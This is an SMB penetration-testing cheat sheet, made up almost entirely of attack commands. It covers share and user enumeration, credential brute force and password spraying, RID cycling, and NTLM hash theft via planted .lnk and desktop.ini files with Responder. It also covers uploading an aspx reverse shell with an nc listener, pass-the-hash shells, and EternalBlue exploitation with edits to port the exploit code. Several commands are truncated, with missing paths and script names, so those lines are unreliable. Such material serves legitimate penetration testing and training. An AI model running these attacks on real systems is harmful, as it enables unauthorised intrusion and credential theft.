SMB (Server Message Block) Pentesting

Last modified: 2024-02-18

Active Directory Windows

It allows clients, like workstations, to communicate with a server like a share directory. Samba is derived from SMB for linux. Default ports are 139, 445.


To enumerate automatically, we can use various tools such as nmap, smbclient, and so on

nmap --script smb-brute -p 445 <target-ip>
nmap --script smb-enum-shares.nse,smb-enum-users.nse -p 445 <target-ip>
nmap --script smb-enum* -p 445 <target-ip>
nmap --script smb-protocols -p 445 <target-ip>
nmap --script smb-vuln* -p 445 <target-ip>

# NetBIOS names
nmblookup -A
nbtscan -r

# Enum4linux
enum4linux <target-ip>
# All enumeration
enum4linux -a <target-ip>
# Verbose
enum4linux -v <target-ip>
# Specify username and password
enum4linux -u username -p password <target-ip>

# Enum4linux-ng
# -A: All simple enumeration including nmblookup
enum4linux-ng -A <target-ip>
# -As: All simple short enumeration without NetBIOS names lookup
enum4linux-ng -As <target-ip>
# -u: Specific username
# -p: Specific password
enum4linux-ng -u "administrator" -p "password" <target-ip>

# NetExec (
netexec smb
netexec smb <target-ip>
netexec smb <target-ip-1> <target-ip-2>
netexec smb <target-ip> -u username -p password
netexec smb <target-ip> -u username -p password --users
# -M zerologon: Scan for ZeroLogon
# -M petitpotam: Scan for PetitPotam
netexec smb <target-ip> -u '' -p '' -M zerologon -M petitpotam
# -M petitpotam: Scan for PetitPotam

Find Shared Folders

# -N: No password
# -L: List shared directories
smbclient -N -L <target-ip>
smbclient -L <target-ip> -U username

smbmap -H <target-ip>
# Recursive
smbmap -H <target-ip> -R
# Username and password
smbmap -u username -p password -H <target-ip>
# Execute a command
smbmap -u username -p password -H <target-ip> -x 'ipconfig'

netexec smb <target-ip> -u '' -p '' --shares
netexec smb <target-ip> -u username -p password --shares

impacket-psexec example.local/username@<target-ip>

Brute Force Credentials

netexec smb <target-ip> -u usernames.txt -p passwords.txt
netexec smb <target-ip> -u usernames.txt -H ntlm_hashes.txt

hydra -l username -P passwords.txt <target-ip> smb
hydra -L usernames.txt -p password <target-ip> smb

# RID Brute Force
netexec smb <target-ip> -u username -p password --rid-brute 20000

# Using Metasploit
msf> use auxiliary/scanner/smb/smb_login

If we find credentials, we can use them for smbclient or WinRM.
If we got "STATUS_PASSWORD_MUST_CHANGE" for some users, we can update a current password to a new one.

smbpasswd -r <target-ip> -U <username>
# or
impacket-smbpasswd <DOMAIN>/<username>:<password>@<target-ip> -newpass <new-password>
# If you don't have impacket-smbpasswd, download it from a repository.

RID Cycling Attack

RID enumeration.
It attempts to enumerate user accounts through null sessions.

# Anonymous logon
# 20000: Maximum RID to be cycled
impacket-lookupsid example.local/anonymous@<target-ip> 20000 -no-pass
impacket-lookupsid example.local/guest@<target-ip> 20000 -no-pass
impacket-lookupsid example.local/guest@<target-ip> 20000
# Specify user
impacket-lookupsid example.local/user@<target-ip> 20000 -hashes <lmhash>:<nthash>
impacket-lookupsid example.local/user@<target-ip> 20000

# This command extract usernames. It's useful for further enumeration which uses usernames.
# Replace the following keywords:
#  - `` => Target domain
#  - ``    => Target IP
#  - `DOMAIN`      => Target domain name
impacket-lookupsid 20000 -no-pass > tmp.txt | cat tmp.txt | grep SidTypeUser | cut -d ' ' -f 2 | sed 's/DOMAIN\\//g' | sort -u > users.txt && rm tmp.txt

Password Spraying Attack

If we have a user password, we might be able to find another user with the same password.

# User enumeration
netexec smb <target-ip> -u John -p Password123 --users
netexec smb <target-ip> -u John -H <NTLM_HASH> --users

# Find users with same password
netexec smb <target-ip> -u users.txt -p Password123 --continue-on-success
netexec smb <target-ip> -u users.txt -p found_passwords.txt --continue-on-success
netexec smb <target-ip> -u users.txt -H <NTLM_HASH> --continue-on-success
netexec smb <target-ip> -u users.txt -H found_ntlm_hashes.txt --continue-on-success

NTLM Stealing

Uploading Desktop.ini

*Move from the content of Steal NTLM with Desktop.ini

Using ntlm_theft

# -g all: Generate all files.
# -s: Local IP (attacker IP)
# -f: Folder to store generated files.
python3 ntlm_theft -g all -s <local-ip> -f samples

After generating files with ntlm_theft , put the .lnk file (samples.lnk here) to the shared folder.

smbclient -N //

smb> put samples.lnk

Now start Responder to retrieve the stolen NTLM hashes. Run the following command in our local machine:

sudo responder -I eth0


You can use smbclient to connect the target.

# anonymous login
smbclient // -N
# If the folder name contains spaces, surround with double quotes
smbclient "// dir" -N
# Specify user
smbclient // -U username
# nobody, no-pass
smbclient // -N -U nobody
# Specify workgroup
smbclient -L -W WORKGROUP -U username

To get a Windows shell, run the following examples.

impacket-wmiexec example.local/username@
# Pass the Hash
impacket-wmiexec -hashes abcdef0123456789abcdef0123456789:c2597747aa5e43022a3a3049a3c3b09d example.local/username@

Commands in SMB

After connecting, we can investigate the shared folder to find sensitive files or information.

List Folders/Files

smb> ls

Download Folders/Files

smb> get sample.txt
# If the filename contains spaces, it need to be enclosed in double-quotes.
smb> get "Example File.txt"

To download files recursively, run the following commands.

smb> mask ""
smb> recurse ON
smb> prompt OFF
smb> mget *

Or using smbget from local machine.
Especially, it’s useful for downloading a large file rather than “get” command in smbclient.

smbget smb://<target-ip>/somedir/example.txt -U username
smbget -R smb://<target-ip>/somedir -U username

# Specify workgroup
smbget -R smb://<target-ip>/somedir -w WORKGROUP -U username

# as anonymous user
smbget smb://<target-ip>/somedir -U anonymous
password: anonymous

Upload Files

# Upload a file
smb> put example.txt
  • Upload Reverse Shell Payload

If the website is associated with the SMB server, we can upload reverse shell script such as aspx, php and get a shell.
To create a payload, please refer to the Web Reverse Shell or the Reverse Shell with Metasploit.

Then upload it to the SMB server as below.

smb> put shell.aspx

Don’t forget to start a listener for getting outcoming connection.

nc -lvnp 4444

Now access to
We can get a shell.

Steal NTLM Hash with Desktop.ini


We can retrieve the hashes by putting desktop.ini file, that contains arbitrary icon resource path, to the shared folder.
Create a new desktop.ini in local machine.


Then upload it to the writable shared folder.

smb> put desktop.ini

Start responder in local machine.

responder -I tun0

After a while, we can retrieve the NTLM hashes.

EternalBlue (MS17-010)

msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set rhosts <target-ip>
msf> set lhost <local-ip>
msf> run
# If you cannot get a shell with the default payloed (windows/x64/meterpreter/reverse_tcp), try to change the payload
msf> set payload payload/generic/shell_reverse_tcp


AutoBlue is an automatic exploit.
Download the repository and run the following example command.

python -target-ip <target-ip> -port 445 'username:password@target'

Manual Exploiting

You need to have two files -,

  1. Download

    wget -O 
    # Convert DOS to UNIX
  2. Edit Some Lines of for Python3

    You need to edit some code because this exploit is old so only supports Python2.

    # transData = b''
    transData = ''
    # transData = ('\x00' * padLen) + str(parameters)
    transData = "".join(map(chr,(b'\x00' * padLen))) + str(parameters)
    # transData += ('\x00' * padLen) + data
    transData += "".join(map(chr,(b'\x00' * padLen))) + str(data)
    # req = str(pkt)
    req = pkt.getData()
    return b'\x00'*2 + pack('>H', len(req)) + req  # assume length is <6553
    # data += resp['Data'][1:]
    data += resp['Data'][1:].decode()
  3. Download

    wget -O
    # Convert DOS to UNIX
  4. Edit the Credentials in

    username = "username"
    password = "password"
  5. Run the script

    python <target-ip> netlogon
    python <target-ip> lsarpc
    python <target-ip> samr

Launch SMB Server

impacket-smbserver share . -smb2support -username user -password pass

Access from Remote Machine

net use \\<local-ip>\share /u:user pass

Transfer Files

# Remote to Local
cp .\example.txt \\<local-ip>\share\example.txt